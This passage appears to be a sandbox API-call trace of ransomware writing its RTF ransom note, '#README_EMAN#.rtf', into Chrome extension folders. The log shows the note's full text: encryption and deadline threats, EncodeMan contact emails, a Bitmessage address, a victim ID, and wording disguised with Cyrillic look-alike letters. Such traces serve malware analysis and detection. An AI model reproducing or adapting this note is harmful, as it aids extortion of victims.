CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.765] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.766] CloseHandle (hObject=0x294) returned 1 [0297.766] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0297.766] GetLastError () returned 0x2 [0297.766] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 